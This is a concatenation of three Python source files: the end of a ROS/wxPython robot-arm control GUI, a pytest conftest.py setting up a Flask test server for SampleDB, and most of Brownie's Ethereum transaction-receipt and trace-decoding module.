wx.CallAfter(self.updateDisplay, self.key)
self.key=[]
def monitor_status(self, evt):
self.key=[]
current_joint_values=self.group.get_current_joint_values()
for i in xrange(len(current_joint_values)):
self.key.append(str(round(current_joint_values[i]*180/math.pi, 2)))
if self.ref_link_lock.acquire():
ref_link=self.ref_link_name
self.ref_link_lock.release()
if self.end_link_lock.acquire():
end_link=self.end_link_name
self.end_link_lock.release()
while not rospy.is_shutdown():
try:
self.listener.waitForTransform(ref_link, end_link, rospy.Time(0), rospy.Duration(100))
(xyz,qua) = self.listener.lookupTransform(ref_link, end_link, rospy.Time(0))
break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
rpy=tf.transformations.euler_from_quaternion(qua)
self.key.append(str(round(xyz[0]*1000, 2)))
self.key.append(str(round(xyz[1]*1000, 2)))
self.key.append(str(round(xyz[2]*1000, 2)))
self.key.append(str(round(rpy[0]*180/math.pi, 2)))
self.key.append(str(round(rpy[1]*180/math.pi, 2)))
self.key.append(str(round(rpy[2]*180/math.pi, 2)))
wx.CallAfter(self.updateDisplay, self.key)
def servo_state_cb(self, data):
if self.servo_state_lock.acquire():
self.servo_state=data.data
self.servo_state_lock.release()
wx.CallAfter(self.update_servo_state, data)
def fault_state_cb(self, data):
if self.fault_state_lock.acquire():
self.fault_state=data.data
self.fault_state_lock.release()
wx.CallAfter(self.update_fault_state, data)
def ref_link_name_cb(self, data):
if self.ref_link_lock.acquire():
self.ref_link_name=data.data
self.ref_link_lock.release()
def end_link_name_cb(self, data):
if self.end_link_lock.acquire():
self.end_link_name=data.data
self.end_link_lock.release()
def listen(self):
rospy.Subscriber(self.elfin_driver_ns+'enable_state', Bool, self.servo_state_cb)
rospy.Subscriber(self.elfin_driver_ns+'fault_state', Bool, self.fault_state_cb)
rospy.Subscriber(self.elfin_basic_api_ns+'reference_link_name', String, self.ref_link_name_cb)
rospy.Subscriber(self.elfin_basic_api_ns+'end_link_name', String, self.end_link_name_cb)
rospy.Timer(rospy.Duration(nsecs=50000000), self.monitor_DO_DI)
rospy.Timer(rospy.Duration(nsecs=50000000), self.set_color)
rospy.Timer(rospy.Duration(nsecs=50000000), self.monitor_status)
if __name__=='__main__':
rospy.init_node('elfin_gui')
app=wx.App(False)
myframe=MyFrame(parent=None,id=-1)
myframe.Show(True)
myframe.listen()
app.MainLoop()
|
conftest.py
|
# coding: utf-8
"""
"""
import getpass
import copy
import logging
import os
import random
import threading
import time
import flask
import flask_login
import pytest
import requests
import sqlalchemy
import sampledb
import sampledb.utils
import sampledb.config
sampledb.config.MAIL_SUPPRESS_SEND = True
sampledb.config.TEMPLATES_AUTO_RELOAD = True
sampledb.config.SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://{0}:@localhost:5432/{0}'.format(getpass.getuser())
sampledb.config.MAIL_SENDER = 'sampledb@example.com'
sampledb.config.MAIL_SERVER = 'mail.example.com'
sampledb.config.CONTACT_EMAIL = 'sampledb@example.com'
sampledb.config.JUPYTERHUB_URL = 'example.com'
sampledb.config.LDAP_NAME = 'LDAP'
sampledb.config.TESTING_LDAP_UNKNOWN_LOGIN = 'unknown-login-for-sampledb-tests'
sampledb.config.TESTING_LDAP_WRONG_PASSWORD = 'wrong-password-for-sampledb-tests'
# restore possibly overridden configuration data from environment variables
sampledb.config.use_environment_configuration(env_prefix='SAMPLEDB_')
def create_flask_server(app):
if not getattr(app, 'has_shutdown_route', False):
@app.route('/shutdown', methods=['POST'])
def shutdown():
func = flask.request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
return 'Server shutting down...'
app.has_shutdown_route = True
port = random.randint(10000, 20000)
server_thread = threading.Thread(target=lambda: app.run(port=port, debug=True, use_reloader=False), daemon=True)
server_thread.start()
server_thread.app = app
server_thread.initial_config = copy.deepcopy(server_thread.app.config)
server_thread.base_url = 'http://localhost:{0}/'.format(port)
server_thread.api_url = server_thread.base_url + 'api/'
# short delay to allow the web server to start
time.sleep(0.1)
yield server_thread
# restore initial configuration
server_thread.app.config = server_thread.initial_config
r = requests.post(server_thread.base_url + 'shutdown')
assert r.status_code == 200
server_thread.join()
@pytest.fixture(scope='session')
def flask_server(worker_id):
if worker_id != 'master':
sampledb.config.SQLALCHEMY_DATABASE_URI = "postgresql+psycopg2://postgres:@postgres:5432/testdb_" + worker_id[2:]
sampledb.config.FILE_STORAGE_PATH = sampledb.config.FILE_STORAGE_PATH + worker_id[2:] + '/'
app = create_app()
# empty the database first, to ensure all tests rebuild it before use
if worker_id != 'master':
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=True)
else:
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=False)
yield from create_flask_server(app)
def create_app():
logging.getLogger('flask.app').setLevel(logging.WARNING)
os.environ['FLASK_ENV'] = 'development'
os.environ['FLASK_TESTING'] = 'True'
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=True)
sampledb_app = sampledb.create_app()
@sampledb_app.route('/users/me/loginstatus')
def check_login():
return flask.jsonify(flask_login.current_user.is_authenticated)
@sampledb_app.route('/users/<int:user_id>/autologin')
def autologin(user_id):
user = sampledb.models.User.query.get(user_id)
assert user is not None
flask_login.login_user(user)
return ''
return sampledb_app
@pytest.fixture
def app(flask_server):
app = flask_server.app
# reset config and database before each test
app.config = copy.deepcopy(flask_server.initial_config)
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=True)
sampledb.setup_database(app)
return app
@pytest.fixture(autouse=True)
def app_context(app):
with app.app_context():
# yield to keep the app context active until the test is done
yield None
|
transaction.py
|
#!/usr/bin/python3
import functools
import re
import sys
import threading
import time
from collections import deque
from enum import IntEnum
from hashlib import sha1
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
from warnings import warn
import black
import requests
from eth_abi import decode_abi
from hexbytes import HexBytes
from web3.exceptions import TransactionNotFound
from brownie._config import CONFIG
from brownie.convert import EthAddress, Wei
from brownie.exceptions import ContractNotFound, RPCRequestError
from brownie.project import build
from brownie.project import main as project_main
from brownie.project.compiler.solidity import SOLIDITY_ERROR_CODES
from brownie.project.sources import highlight_source
from brownie.test import coverage
from brownie.utils import color
from brownie.utils.output import build_tree
from . import state
from .event import EventDict, _decode_logs, _decode_trace
from .web3 import web3
_marker = deque("-/|\\-/|\\")
def trace_property(fn: Callable) -> Any:
# attributes that are only available after querying the tranasaction trace
@property # type: ignore
def wrapper(self: "TransactionReceipt") -> Any:
if self.status < 0:
return None
if self._trace_exc is not None:
raise self._trace_exc
try:
return fn(self)
except RPCRequestError as exc:
if web3.supports_traces:
# if the node client supports traces, raise the actual error
raise exc
raise RPCRequestError(
f"Accessing `TransactionReceipt.{fn.__name__}` on a {self.status.name.lower()} "
"transaction requires the `debug_traceTransaction` RPC endpoint, but the node "
"client does not support it or has not made it available."
) from None
return wrapper
def trace_inspection(fn: Callable) -> Any:
def wrapper(self: "TransactionReceipt", *args: Any, **kwargs: Any) -> Any:
if self.contract_address:
raise NotImplementedError(
"Trace inspection methods are not available for deployment transactions."
)
if self.input == "0x" and self.gas_used == 21000:
return None
return fn(self, *args, **kwargs)
functools.update_wrapper(wrapper, fn)
return wrapper
class Status(IntEnum):
Dropped = -2
Pending = -1
Reverted = 0
Confirmed = 1
class TransactionReceipt:
"""Attributes and methods relating to a broadcasted transaction.
* All ether values are given as integers denominated in wei.
* Before the tx has confirmed, most attributes are set to None
* Accessing methods / attributes that query debug_traceTransaction
may be very slow if the transaction involved many steps
Attributes:
contract_name: Name of the contract called in the transaction
fn_name: Name of the method called in the transaction
txid: Transaction ID
sender: Address of the sender
receiver: Address of the receiver
value: Amount transferred
gas_price: Gas price
gas_limit: Gas limit
gas_used: Gas used
input: Hexstring input data
confirmations: The number of blocks since the transaction was confirmed
nonce: Transaction nonce
block_number: Block number this transaction was included in
timestamp: Timestamp of the block this transaction was included in
txindex: Index of the transaction within the mined block
contract_address: Address of contract deployed by the transaction
logs: Raw transaction logs
status: Transaction status: -1 pending, 0 reverted, 1 successful
Additional attributes:
(only available if debug_traceTransaction is enabled in the RPC)
events: Decoded transaction log events
trace: Expanded stack trace from debug_traceTransaction
return_value: Return value(s) from contract call
revert_msg: Error string from reverted contract all
modified_state: Boolean, did this contract write to storage?"""
# these are defined as class attributes to expose them in console completion hints
block_number = None
contract_address: Optional[str] = None
contract_name = None
fn_name = None
gas_used = None
logs: Optional[List] = None
nonce = None
sender = None
txid: str
txindex = None
type: int
def __init__(
self,
txid: Union[str, bytes],
sender: Any = None,
silent: bool = True,
required_confs: int = 1,
is_blocking: bool = True,
name: str = "",
revert_data: Optional[Tuple] = None,
) -> None:
"""Instantiates a new TransactionReceipt object.
Args:
txid: hexstring transaction ID
sender: sender as a hex string or Account object
required_confs: the number of required confirmations before processing the receipt
is_blocking: if True, creating the object is a blocking action until the required
confirmations are received
silent: toggles console verbosity (default True)
name: contract function being called
revert_data: (revert string, program counter, revert type)
"""
self._silent = silent
if isinstance(txid, bytes):
txid = HexBytes(txid).hex()
# this event is set once the transaction is confirmed or dropped
# it is used to waiting during blocking transaction actions
self._confirmed = threading.Event()
# internal attributes
self._call_cost = 0
self._trace_exc: Optional[Exception] = None
self._trace_origin: Optional[str] = None
self._raw_trace: Optional[List] = None
self._trace: Optional[List] = None
self._events: Optional[EventDict] = None
self._return_value: Any = None
self._revert_msg: Optional[str] = None
self._dev_revert_msg: Optional[str] = None
self._modified_state: Optional[bool] = None
self._new_contracts: Optional[List] = None
self._internal_transfers: Optional[List[Dict]] = None
self._subcalls: Optional[List[Dict]] = None
# attributes that can be set immediately
self.sender = sender
self.status = Status(-1)
self.txid = str(txid)
self.contract_name = None
self.fn_name = name
if name and "." in name:
self.contract_name, self.fn_name = name.split(".", maxsplit=1)
# avoid querying the trace to get the revert string if possible
self._revert_msg, self._revert_pc, revert_type = revert_data or (None, None, None)
if self._revert_msg is None and revert_type not in ("revert", "invalid_opcode"):
self._revert_msg = revert_type
if self._revert_pc is not None:
self._dev_revert_msg = build._get_dev_revert(self._revert_pc) or None
tx: Dict = web3.eth.get_transaction(HexBytes(self.txid))
self._set_from_tx(tx)
if not self._silent:
output_str = ""
if self.type == 2:
max_gas = tx["maxFeePerGas"] / 10 ** 9
priority_gas = tx["maxPriorityFeePerGas"] / 10 ** 9
output_str = (
f" Max fee: {color('bright blue')}{max_gas}{color} gwei"
f" Priority fee: {color('bright blue')}{priority_gas}{color} gwei"
)
elif self.gas_price is not None:
gas_price = self.gas_price / 10 ** 9
output_str = f" Gas price: {color('bright blue')}{gas_price}{color} gwei"
print(
f"{output_str} Gas limit: {color('bright blue')}{self.gas_limit}{color}"
f" Nonce: {color('bright blue')}{self.nonce}{color}"
)
# await confirmation of tx in a separate thread which is blocking if
# required_confs > 0 or tx has already confirmed (`blockNumber` != None)
confirm_thread = threading.Thread(
target=self._await_confirmation, args=(tx["blockNumber"], required_confs), daemon=True
)
confirm_thread.start()
if is_blocking and (required_confs > 0 or tx["blockNumber"]):
confirm_thread.join()
def __repr__(self) -> str:
color_str = {-2: "dark white", -1: "bright yellow", 0: "bright red", 1: ""}[self.status]
return f"<Transaction '{color(color_str)}{self.txid}{color}'>"
def __hash__(self) -> int:
return hash(self.txid)
@trace_property
def events(self) -> Optional[EventDict]:
if self._events is None:
if self.status:
# relay contract map so we can decode ds-note logs
addrs = {log.address for log in self.logs} if self.logs else set()
contracts = {addr: state._find_contract(addr) for addr in addrs}
self._events = _decode_logs(self.logs, contracts=contracts) # type: ignore
else:
self._get_trace()
# get events from the trace - handled lazily so that other
# trace operations are not blocked in case of a decoding error
initial_address = str(self.receiver or self.contract_address)
self._events = _decode_trace(self._raw_trace, initial_address) # type: ignore
return self._events
@trace_property
def internal_transfers(self) -> Optional[List]:
if not self.status:
return []
if self._internal_transfers is None:
self._expand_trace()
return self._internal_transfers
@trace_property
def modified_state(self) -> Optional[bool]:
if not self.status:
self._modified_state = False
elif self._modified_state is None:
self._get_trace()
return self._modified_state
@trace_property
def new_contracts(self) -> Optional[List]:
if not self.status:
return []
if self._new_contracts is None:
self._expand_trace()
return self._new_contracts
@trace_property
def return_value(self) -> Optional[str]:
if not self.status:
return None
if self._return_value is None:
self._get_trace()
return self._return_value
@trace_property
def revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._revert_msg is None:
self._get_trace()
elif self.contract_address and self._revert_msg == "out of gas":
self._get_trace()
return self._revert_msg
@trace_property
def dev_revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._dev_revert_msg is None:
self._get_trace()
return self._dev_revert_msg or None
@trace_property
def subcalls(self) -> Optional[List]:
if self._subcalls is None:
self._expand_trace()
subcalls = filter(lambda s: not _is_call_to_precompile(s), self._subcalls) # type: ignore
return list(subcalls)
@trace_property
def trace(self) -> Optional[List]:
if self._trace is None:
self._expand_trace()
return self._trace
@property
def timestamp(self) -> Optional[int]:
if self.status < 0:
return None
return web3.eth.get_block(self.block_number)["timestamp"]
@property
def confirmations(self) -> int:
if not self.block_number:
return 0
return web3.eth.block_number - self.block_number + 1
def replace(
self,
increment: Optional[float] = None,
gas_price: Optional[Wei] = None,
silent: Optional[bool] = None,
) -> "TransactionReceipt":
"""
Rebroadcast this transaction with a higher gas price.
Exactly one of `increment` and `gas_price` must be given.
Arguments
---------
increment : float, optional
Multiplier applied to the gas price of this transaction in order
to determine the new gas price. For EIP1559 transactions the multiplier
is applied to the max_fee, the priority_fee is incremented by 1.1.
gas_price : Wei, optional
Absolute gas price to use in the replacement transaction. For EIP1559
transactions this is the new max_fee, the priority_fee is incremented
by 1.1.
silent : bool, optional
Toggle console verbosity (default is same setting as this transaction)
Returns
-------
TransactionReceipt
New transaction object
"""
if increment is None and gas_price is None:
raise ValueError("Must give one of `increment` or `gas_price`")
if gas_price is not None and increment is not None:
raise ValueError("Cannot set `increment` and `gas_price` together")
if self.status > -1:
raise ValueError("Transaction has already confirmed")
if self.gas_price is not None:
if increment is not None:
gas_price = Wei(self.gas_price * increment)
else:
gas_price = Wei(gas_price)
max_fee, priority_fee = None, None
if self.max_fee is not None and self.priority_fee is not None:
max_fee = gas_price
priority_fee = Wei(self.priority_fee * 1.1)
gas_price = None
if silent is None:
silent = self._silent
sender = self.sender
if isinstance(sender, EthAddress):
# if the transaction wasn't broadcast during this brownie session,
# check if the sender is unlocked - we might be able to replace anyway
from brownie import accounts
if sender in accounts:
sender = accounts.at(sender)
else:
raise ValueError("Sender address not in `accounts`")
return sender.transfer( # type: ignore
self.receiver,
self.value,
gas_limit=self.gas_limit,
gas_price=gas_price,
max_fee=max_fee,
priority_fee=priority_fee,
data=self.input,
nonce=self.nonce,
required_confs=0,
silent=silent,
)
def wait(self, required_confs: int) -> None:
if required_confs < 1:
return
if self.confirmations > required_confs:
print(f"This transaction already has {self.confirmations} confirmations.")
return
while True:
try:
tx: Dict = web3.eth.get_transaction(self.txid)
break
except TransactionNotFound:
if self.nonce is not None:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
if sender_nonce > self.nonce:
self.status = Status(-2)
self._confirmed.set()
return
time.sleep(1)
self._await_confirmation(tx["blockNumber"], required_confs)
def _raise_if_reverted(self, exc: Any) -> None:
if self.status or CONFIG.mode == "console":
return
if not web3.supports_traces:
# if traces are not available, do not attempt to determine the revert reason
raise exc or ValueError("Execution reverted")
if self._dev_revert_msg is None:
# no revert message and unable to check dev string - have to get trace
self._expand_trace()
if self.contract_address:
source = ""
elif CONFIG.argv["revert"]:
source = self._traceback_string()
else:
source = self._error_string(1)
contract = state._find_contract(self.receiver)
if contract:
marker = "//" if contract._build["language"] == "Solidity" else "#"
line = self._traceback_string().split("\n")[-1]
if marker + " dev: " in line:
self._dev_revert_msg = line[line.index(marker) + len(marker) : -5].strip()
raise exc._with_attr(
source=source, revert_msg=self._revert_msg, dev_revert_msg=self._dev_revert_msg
)
def _await_confirmation(self, block_number: int = None, required_confs: int = 1) -> None:
# await first confirmation
block_number = block_number or self.block_number
nonce_time = 0.0
sender_nonce = 0
while True:
# every 15 seconds, check if the nonce increased without a confirmation of
# this specific transaction. if this happens, the tx has likely dropped
# and we should stop waiting.
if time.time() - nonce_time > 15:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
nonce_time = time.time()
try:
receipt = web3.eth.get_transaction_receipt(HexBytes(self.txid))
except TransactionNotFound:
receipt = None
# the null blockHash check is required for older versions of Parity
# taken from `web3._utils.transactions.wait_for_transaction_receipt`
if receipt is not None and receipt["blockHash"] is not None:
break
# continuation of the nonce logic 2 sections prior. we must check the receipt
# after querying the nonce, because in the other order there is a chance that
# the tx would confirm after checking the receipt but before checking the nonce
if sender_nonce > self.nonce: # type: ignore
self.status = Status(-2)
self._confirmed.set()
return
if not block_number and not self._silent and required_confs > 0:
if required_confs == 1:
sys.stdout.write(f" Waiting for confirmation... {_marker[0]}\r")
else:
sys.stdout.write(
f" Required confirmations: {color('bright yellow')}0/"
f"{required_confs}{color} {_marker[0]}\r"
)
_marker.rotate(1)
sys.stdout.flush()
time.sleep(1)
# silence other dropped tx's immediately after confirmation to avoid output weirdness
for dropped_tx in state.TxHistory().filter(
sender=self.sender, nonce=self.nonce, key=lambda k: k != self
):
dropped_tx._silent = True
self.block_number = receipt["blockNumber"]
# wait for more confirmations if required and handle uncle blocks
remaining_confs = required_confs
while remaining_confs > 0 and required_confs > 1:
try:
receipt = web3.eth.get_transaction_receipt(self.txid)
self.block_number = receipt["blockNumber"]
except TransactionNotFound:
if not self._silent:
sys.stdout.write(f"\r{color('red')}Transaction was lost...{color}{' ' * 8}")
sys.stdout.flush()
# check if tx is still in mempool, this will raise otherwise
tx = web3.eth.get_transaction(self.txid)
self.block_number = None
return self._await_confirmation(tx["blockNumber"], required_confs)
if required_confs - self.confirmations != remaining_confs:
remaining_confs = required_confs - self.confirmations
if not self._silent:
sys.stdout.write(
f"\rRequired confirmations: {color('bright yellow')}{self.confirmations}/"
f"{required_confs}{color} "
)
if remaining_confs == 0:
sys.stdout.write("\n")
sys.stdout.flush()
if remaining_confs > 0:
time.sleep(1)
self._set_from_receipt(receipt)
# if coverage evaluation is active, evaluate the trace
if (
CONFIG.argv["coverage"]
and not coverage._check_cached(self.coverage_hash)
and self.trace
):
self._expand_trace()
if not self._silent and required_confs > 0:
print(self._confirm_output())
# set the confirmation event and mark other tx's with the same nonce as dropped
self._confirmed.set()
for dropped_tx in state.TxHistory().filter(
sender=self.sender, nonce=self.nonce, key=lambda k: k != self
):
dropped_tx.status = Status(-2)
dropped_tx._confirmed.set()
def _set_from_tx(self, tx: Dict) -> None:
if not self.sender:
self.sender = EthAddress(tx["from"])
self.receiver = EthAddress(tx["to"]) if tx["to"] else None
self.value = Wei(tx["value"])
self.gas_price = tx.get("gasPrice")
self.max_fee = tx.get("maxFeePerGas")
self.priority_fee = tx.get("maxPriorityFeePerGas")
self.gas_limit = tx["gas"]
self.input = tx["input"]
self.nonce = tx["nonce"]
self.type = int(HexBytes(tx.get("type", 0)).hex(), 16)
# if receiver is a known contract, set function name
if self.fn_name:
return
try:
contract = state._find_contract(tx["to"])
if contract is not None:
self.contract_name = contract._name
self.fn_name = contract.get_method(tx["input"])
except ContractNotFound:
# required in case the contract has self destructed
# other aspects of functionality will be broken, but this way we
# can at least return a receipt
pass
def _set_from_receipt(self, receipt: Dict) -> None:
"""Sets object attributes based on the transaction reciept."""
self.block_number = receipt["blockNumber"]
self.txindex = receipt["transactionIndex"]
self.gas_used = receipt["gasUsed"]
self.logs = receipt["logs"]
self.status = Status(receipt["status"])
if "effectiveGasPrice" in receipt:
self.gas_price = receipt["effectiveGasPrice"]
self.contract_address = receipt["contractAddress"]
if self.contract_address and not self.contract_name:
self.contract_name = "UnknownContract"
base = (
f"{self.nonce}{self.block_number}{self.sender}{self.receiver}"
f"{self.value}{self.input}{int(self.status)}{self.gas_used}{self.txindex}"
)
self.coverage_hash = sha1(base.encode()).hexdigest()
if self.fn_name:
state.TxHistory()._gas(self._full_name(), receipt["gasUsed"], self.status == Status(1))
def _confirm_output(self) -> str:
status = ""
if not self.status:
revert_msg = self.revert_msg if web3.supports_traces else None
status = f"({color('bright red')}{revert_msg or 'reverted'}{color}) "
result = (
f"\r {self._full_name()} confirmed {status} "
f"Block: {color('bright blue')}{self.block_number}{color} "
f"Gas used: {color('bright blue')}{self.gas_used}{color} "
f"({color('bright blue')}{self.gas_used / self.gas_limit:.2%}{color})"
)
if self.type == 2 and self.gas_price is not None:
result += f" Gas price: {color('bright blue')}{self.gas_price / 10 ** 9}{color} gwei"
if self.status and self.contract_address:
result += (
f"\n {self.contract_name} deployed at: "
f"{color('bright blue')}{self.contract_address}{color}"
)
return result + "\n"
def _get_trace(self) -> None:
"""Retrieves the stack trace via debug_traceTransaction and finds the
return value, revert message and event logs in the trace.
"""
# check if trace has already been retrieved, or the tx warrants it
if self._raw_trace is not None:
return
self._raw_trace = []
if self.input == "0x" and self.gas_used == 21000:
self._modified_state = False
self._trace = []
return
if not web3.supports_traces:
raise RPCRequestError("Node client does not support `debug_traceTransaction`")
try:
trace = web3.provider.make_request( # type: ignore
"debug_traceTransaction", (self.txid, {"disableStorage": CONFIG.mode != "console"})
)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
msg = f"Encountered a {type(e).__name__} while requesting "
msg += "`debug_traceTransaction`. The local RPC client has likely crashed."
if CONFIG.argv["coverage"]:
msg += " If the error persists, add the `skip_coverage` marker to this test."
raise RPCRequestError(msg) from None
if "error" in trace:
self._modified_state = None
self._trace_exc = RPCRequestError(trace["error"]["message"])
raise self._trace_exc
self._raw_trace = trace = trace["result"]["structLogs"]
if not trace:
self._modified_state = False
return
# different nodes return slightly different formats. its really fun to handle
# geth/nethermind returns unprefixed and with 0-padding for stack and memory
# erigon returns 0x-prefixed and without padding (but their memory values are like geth)
fix_stack = False
for step in trace:
if not step["stack"]:
continue
check = step["stack"][0]
if not isinstance(check, str):
break
if check.startswith("0x"):
fix_stack = True
break
fix_gas = isinstance(trace[0]["gas"], str)
if fix_stack or fix_gas:
for step in trace:
if fix_stack:
# for stack values, we need 32 bytes (64 chars) without the 0x prefix
step["stack"] = [HexBytes(s).hex()[2:].zfill(64) for s in step["stack"]]
if fix_gas:
# handle traces where numeric values are returned as hex (Nethermind)
step["gas"] = int(step["gas"], 16)
step["gasCost"] = int.from_bytes(HexBytes(step["gasCost"]), "big", signed=True)
step["pc"] = int(step["pc"], 16)
if self.status:
self._confirmed_trace(trace)
else:
self._reverted_trace(trace)
def _confirmed_trace(self, trace: Sequence) -> None:
self._modified_state = next((True for i in trace if i["op"] == "SSTORE"), False)
if trace[-1]["op"] != "RETURN" or self.contract_address:
return
contract = state._find_contract(self.receiver)
if contract:
data = _get_memory(trace[-1], -1)
fn = contract.get_method_object(self.input)
if not fn:
warn(f"Unable to find function on {contract} for input {self.input}")
return
self._return_value = fn.decode_output(data)
def _reverted_trace(self, trace: Sequence) -> None:
self._modified_state = False
if self.contract_address:
step = next((i for i in trace if i["op"] == "CODECOPY"), None)
if step is not None and int(step["stack"][-3], 16) > 24577:
self._revert_msg = "exceeds EIP-170 size limit"
self._dev_revert_msg = ""
if self._dev_revert_msg is not None:
return
# iterate over revert instructions in reverse to find revert message
for step in (i for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")):
if step["op"] == "REVERT" and int(step["stack"][-2], 16):
# get returned error string from stack
data = _get_memory(step, -1)
selector = data[:4].hex()
if selector == "0x4e487b71": # keccak of Panic(uint256)
error_code = int(data[4:].hex(), 16)
if error_code in SOLIDITY_ERROR_CODES:
self._revert_msg = SOLIDITY_ERROR_CODES[error_code]
else:
self._revert_msg = f"Panic (error code: {error_code})"
elif selector == "0x08c379a0": # keccak of Error(string)
self._revert_msg = decode_abi(["string"], data[4:])[0]
else:
# TODO: actually parse the data
self._revert_msg = f"typed error: {data.hex()}"
elif self.contract_address:
self._revert_msg = "invalid opcode" if step["op"] == "INVALID" else ""
self._dev_revert_msg = ""
return
# check for dev revert string using program counter
dev_revert = build._get_dev_revert(step["pc"]) or None
if dev_revert is not None:
self._dev_revert_msg = dev_revert
if self._revert_msg is None:
self._revert_msg = dev_revert
else:
# if none is found, expand the trace and get it from the pcMap
self._expand_trace()
try:
contract = state._find_contract(step["address"])
pc_map = contract._build["pcMap"]
# if this is the function selector revert, check for a jump
if "first_revert" in pc_map[step["pc"]]:
idx = trace.index(step) - 4
if trace[idx]["pc"] != step["pc"] - 4:
step = trace[idx]
# if this is the optimizer revert, find the actual source
if "optimizer_revert" in pc_map[step["pc"]]:
idx = trace.index(step) - 1
# look for the most recent jump
while trace[idx + 1]["op"] != "JUMPDEST":
if trace[idx]["source"] != step["source"]:
# if we find another line with a differing source offset prior
# to a JUMPDEST, the optimizer revert is also the actual revert
idx = trace.index(step)
break
idx -= 1
while not trace[idx]["source"]:
# now we're in a yul optimization, keep stepping back
# until we find a source offset
idx -= 1
# at last we have the real location of the revert
step["source"] = trace[idx]["source"]
step = trace[idx]
if "dev" in pc_map[step["pc"]]:
self._dev_revert_msg = pc_map[step["pc"]]["dev"]
else:
# extract the dev revert string from the source code
# TODO this technique appears superior to `_get_dev_revert`, and
# changes in solc 0.8.0 have necessitated it. the old approach
# of building a dev revert map should be refactored out in favor
# of this one.
source = contract._sources.get(step["source"]["filename"])
offset = step["source"]["offset"][1]
line = source[offset:].split("\n")[0]
marker = "//" if contract._build["language"] == "Solidity" else "#"
revert_str = line[line.index(marker) + len(marker) :].strip()
if revert_str.startswith("dev:"):
self._dev_revert_msg = revert_str
if self._revert_msg is None:
self._revert_msg = self._dev_revert_msg or ""
return
except (KeyError, AttributeError, TypeError, ValueError):
pass
if self._revert_msg is not None:
if self._dev_revert_msg is None:
self._dev_revert_msg = ""
return
op = next((i["op"] for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")), None)
self._revert_msg = "invalid opcode" if op == "INVALID" else ""
def _expand_trace(self) -> None:
"""Adds the following attributes to each step of the stack trace:
address: The address executing this contract.
contractName: The name of the contract.
fn: The name of the function.
jumpDepth: Number of jumps made since entering this contract. The
initial value is 0.
source: {
filename: path to the source file for this step
offset: Start and end offset associated source code
}
"""
if self._raw_trace is None:
self._get_trace()
if self._trace is not None:
# in case `_get_trace` also expanded the trace, do not repeat
return
self._trace = trace = self._raw_trace
self._new_contracts = []
self._internal_transfers = []
self._subcalls = []
if self.contract_address or not trace:
coverage._add_transaction(self.coverage_hash, {})
return
if trace[0]["depth"] == 1:
self._trace_origin = "geth"
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
for t in trace:
t["depth"] = t["depth"] - 1
else:
self._trace_origin = "ganache"
if trace[0]["gasCost"] >= 21000:
# in ganache <6.10.0, gas costs are shifted by one step - we can
# identify this when the first step has a gas cost >= 21000
self._call_cost = trace[0]["gasCost"]
for i in range(len(trace) - 1):
trace[i]["gasCost"] = trace[i + 1]["gasCost"]
trace[-1]["gasCost"] = 0
else:
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
# last_map gives a quick reference of previous values at each depth
last_map = {0: _get_last_map(self.receiver, self.input[:10])} # type: ignore
coverage_eval: Dict = {last_map[0]["name"]: {}}
precompile_contract = re.compile(r"0x0{38}(?:0[1-9]|1[0-8])")
call_opcodes = ("CALL", "STATICCALL", "DELEGATECALL")
for i in range(len(trace)):
# if depth has increased, tx has called into a different contract
is_depth_increase = trace[i]["depth"] > trace[i - 1]["depth"]
is_subcall = trace[i - 1]["op"] in call_opcodes
if is_depth_increase or is_subcall:
step = trace[i - 1]
if step["op"] in ("CREATE", "CREATE2"):
# creating a new contract
out = next(x for x in trace[i:] if x["depth"] == step["depth"])
address = out["stack"][-1][-40:]
sig = f"<{step['op']}>"
calldata = None
self._new_contracts.append(EthAddress(address))
if int(step["stack"][-1], 16):
self._add_internal_xfer(step["address"], address, step["stack"][-1])
else:
# calling an existing contract
stack_idx = -4 if step["op"] in ("CALL", "CALLCODE") else -3
offset = int(step["stack"][stack_idx], 16)
length = int(step["stack"][stack_idx - 1], 16)
calldata = HexBytes("".join(step["memory"]))[offset : offset + length]
sig = calldata[:4].hex()
address = step["stack"][-2][-40:]
if is_depth_increase:
last_map[trace[i]["depth"]] = _get_last_map(address, sig)
coverage_eval.setdefault(last_map[trace[i]["depth"]]["name"], {})
self._subcalls.append(
{"from": step["address"], "to": EthAddress(address), "op": step["op"]}
)
if step["op"] in ("CALL", "CALLCODE"):
self._subcalls[-1]["value"] = int(step["stack"][-3], 16)
if is_depth_increase and calldata and last_map[trace[i]["depth"]].get("function"):
fn = last_map[trace[i]["depth"]]["function"]
self._subcalls[-1]["function"] = fn._input_sig
try:
zip_ = zip(fn.abi["inputs"], fn.decode_input(calldata))
inputs = {i[0]["name"]: i[1] for i in zip_} # type: ignore
self._subcalls[-1]["inputs"] = inputs
except Exception:
self._subcalls[-1]["calldata"] = calldata.hex()
elif calldata or is_subcall:
self._subcalls[-1]["calldata"] = calldata.hex() # type: ignore
if precompile_contract.search(str(self._subcalls[-1]["from"])) is not None:
caller = self._subcalls.pop(-2)["from"]
self._subcalls[-1]["from"] = caller
# update trace from last_map
last = last_map[trace[i]["depth"]]
trace[i].update(
address=last["address"],
contractName=last["name"],
fn=last["internal_calls"][-1],
jumpDepth=last["jumpDepth"],
source=False,
)
opcode = trace[i]["op"]
if opcode == "CALL" and int(trace[i]["stack"][-3], 16):
self._add_internal_xfer(
last["address"], trace[i]["stack"][-2][-40:], trace[i]["stack"][-3]
)
try:
